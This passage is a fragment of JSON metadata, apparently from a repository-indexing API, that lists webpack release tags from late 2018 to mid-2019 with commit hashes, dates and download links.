github.com/webpack/webpack/tar.gz/v5.0.0-alpha.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19/manifests"},{"name":"v4.39.1","sha":"f29445d46624ef4726465e27bbe6e003aa07f8be","kind":"tag","published_at":"2019-08-02T12:35:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1/manifests"},{"name":"v4.39.0","sha":"5344837ed67479b838ad07ff353919d41f5d2b9f","kind":"tag","published_at":"2019-08-01T15:30:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0/manifests"},{"name":"v4.38.0","sha":"ae3db13d7db6dbcdc27f2f3095b532c60c9de1c9","kind":"tag","published_at":"2019-07-26T07:26:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0/manifests"},{"name":"v4.37.0","sha":"04b0d6b4eaa0e18629998e28f795914291c34723","kind":"tag","published_at":"2019-07-23T09:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0/manifests"},{"name":"v4.36.1","sha":"92caa5de066ded4232a119752bd5dde1497606ef","kind":"tag","published_at":"2019-07-17T13:58:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1/manifests"},{"name":"v4.36.0","sha":"95d21bb39a1e700f28be776b300492c50a169fc7","kind":"tag","published_at":"2019-07-17T11:32:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0/manifests"},{"name":"v5.0.0-alpha.18","sha":"9d05b680f02b7bdae81eff47a18f95d1f21ed053","kind":"tag","published_at":"2019-07-08T20:25:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18/manifests"},{"name":"v4.35.3","sha":"4ec90ceba4206aeb91d4c0f7e12dc889d238001e","kind":"tag","published_at":"2019-07-08T13:53:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3/manifests"},{"name":"v5.0.0-alpha.17","sha":"7ade38d01107be2f55277b61fb683341884cdc7c","kind":"tag","published_at":"2019-07-01T10:22:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17/manifests"},{"name":"v4.35.2","sha":"bf3e869a423a60581dcb64e215b8d14403e997f2","kind":"tag","published_at":"2019-07-01T09:18:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2/manifests"},{"name":"v4.35.1","sha":"569dd6a2d2e31f218578c79a4b25dfe61baf6c08","kind":"tag","published_at":"2019-07-01T09:07:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1/manifests"},{"name":"v4.35.0","sha":"c3377ef76ec708ed9c55314e8386f438abea178c","kind":"tag","published_at":"2019-06-19T19:15:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0/manifests"},{"name":"v5.0.0-alpha.16","sha":"56b8aa7006df3c7c9d6634dd11fc6a9f5bac9644","kind":"tag","published_at":"2019-06-14T13:25:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16/manifests"},{"name":"v4.34.0","sha":"34c86675728430c0f41fe415dbbacf87b5a2875d","kind":"tag","published_at":"2019-06-12T23:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0/manifests"},{"name":"v5.0.0-alpha.15","sha":"224daec09d68f17ef705eafc9ecafeb3fa7fd7a9","kind":"tag","published_at":"2019-06-05T16:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15/manifests"},{"name":"v4.33.0","sha":"d45bec3518f53153287ff2cad3cfae9d2b248d9a","kind":"tag","published_at":"2019-06-04T19:32:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0/manifests"},{"name":"v5.0.0-alpha.14","sha":"0037e7355a147cf0fe8df9c56f1b9515b1a87f88","kind":"tag","published_at":"2019-05-23T07:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14/manifests"},{"name":"v4.32.2","sha":"5d3004cccd3dd5af2721c39a7a8a27b12b3d0c19","kind":"tag","published_at":"2019-05-22T23:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2/manifests"},{"name":"v4.32.1","sha":"87fc33edbec46f721a2186194f2bc0c8fc14b464","kind":"tag","published_at":"2019-05-22T06:30:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1/manifests"},{"name":"v5.0.0-alpha.13","sha":"8d05c28e9c679f77cd054a84e261525773092b06","kind":"tag","published_at":"2019-05-20T12:55:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13/manifests"},{"name":"v4.32.0","sha":"bbe71d89cb7a8c1cc81ce1e17929d8de2260ff80","kind":"tag","published_at":"2019-05-20T09:53:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0/manifests"},{"name":"v5.0.0-alpha.12","sha":"e72fed4877c59d6d842a3596328c6e045d2b5eca","kind":"tag","published_at":"2019-05-10T22:40:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12/manifests"},{"name":"v4.31.0","sha":"2e1e1799b1fc56b68dbddbe8712ff6393654ccbd","kind":"tag","published_at":"2019-05-09T07:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0/manifests"},{"name":"v4.30.0","sha":"b72b96a2bc5d2c7a308d0943567e0db191d3c358","kind":"tag","published_at":"2019-04-12T20:06:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0/manifests"},{"name":"v4.29.6","sha":"685a0626cb10664133ef2fb2e2f9f4cb3971402a","kind":"tag","published_at":"2019-02-28T09:44:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6/manifests"},{"name":"v5.0.0-alpha.11","sha":"589e4e4d9d42401d638c442e5b83bb28213b614a","kind":"tag","published_at":"2019-02-19T10:50:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11/manifests"},{"name":"v4.29.5","sha":"073813f1913e000302be557272b2d11195f9c2e6","kind":"tag","published_at":"2019-02-18T10:05:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5/manifests"},{"name":"v4.29.4","sha":"7ecf992bd97204fbfaeed18e3e21fb9fcd46352f","kind":"tag","published_at":"2019-02-15T15:10:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4/manifests"},{"name":"v5.0.0-alpha.10","sha":"2d7338d2b5cc70c6bd250a878d8a9717cc02cb95","kind":"tag","published_at":"2019-02-07T08:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10/manifests"},{"name":"v4.29.3","sha":"b934e26da8b65bdf36b3c71141d0c2d8397d9f44","kind":"tag","published_at":"2019-02-07T08:22:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3/manifests"},{"name":"v4.29.2","sha":"74b8aac0adfb0c79d70a99fa86635930db8944fd","kind":"tag","published_at":"2019-02-06T14:05:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2/manifests"},{"name":"v4.29.1","sha":"6934b9814492b049e67efb3ccf7254d8917e01f9","kind":"tag","published_at":"2019-02-04T17:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1/manifests"},{"name":"v5.0.0-alpha.9","sha":"92a36b1a9c0ed554c0f7e74bf1bc98c77a768fcc","kind":"tag","published_at":"2019-01-27T12:18:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9/manifests"},{"name":"v4.29.0","sha":"25bccd4c487a5bf743efc62947d81a8eaa81a90f","kind":"tag","published_at":"2019-01-20T17:38:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0/manifests"},{"name":"v5.0.0-alpha.8","sha":"adff7f61a2595ea9a04c0f3070add21be01607fb","kind":"tag","published_at":"2019-01-19T19:24:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8/manifests"},{"name":"v5.0.0-alpha.7","sha":"18aca2fcb148d04ba3d0b37742f50534d42a7ec3","kind":"tag","published_at":"2019-01-19T12:11:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7/manifests"},{"name":"v5.0.0-alpha.6","sha":"4be6797700753a54b223600f01e941580b6a6ba3","kind":"tag","published_at":"2019-01-15T16:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6/manifests"},{"name":"v4.28.4","sha":"fdb6b139b94273e5b18870262c193a93f65132e8","kind":"tag","published_at":"2019-01-10T15:48:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4/manifests"},{"name":"v5.0.0-alpha.5","sha":"0d9ed482bc39fb23040ffd26823e0b7ed73320cb","kind":"tag","published_at":"2019-01-09T14:20:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5/manifests"},{"name":"v5.0.0-alpha.4","sha":"b97bc4bc062cd5395de8b00115519472645d57d0","kind":"tag","published_at":"2019-01-08T14:09:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4/manifests"},{"name":"v5.0.0-alpha.3","sha":"762155dc2da6795dfe72a5cbeb632fc42c9c49e0","kind":"tag","published_at":"2018-12-29T17:13:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3/manifests"},{"name":"v4.28.3","sha":"983c2616ec1b869bfb659b6331bd2fe2abc66e23","kind":"tag","published_at":"2018-12-29T11:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3/manifests"},{"name":"v5.0.0-alpha.2","sha":"88f0e18e64c7935723348de3b7dd1aa92050999c","kind":"tag","published_at":"2018-12-26T10:33:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2/manifests"},{"name":"v5.0.0-alpha.1","sha":"90a0866efcd35401353c9e8d5c904fe2cd407f7e","kind":"tag","published_at":"2018-12-23T20:24:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1/manifests"},{"name":"v4.28.2","sha":"fe514dd975f1d2dd1546906a6f4c0a6b2a0e3761","kind":"tag","published_at":"2018-12-22T12:53:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.2","dependencies_parsed_at":null,"dependency_jo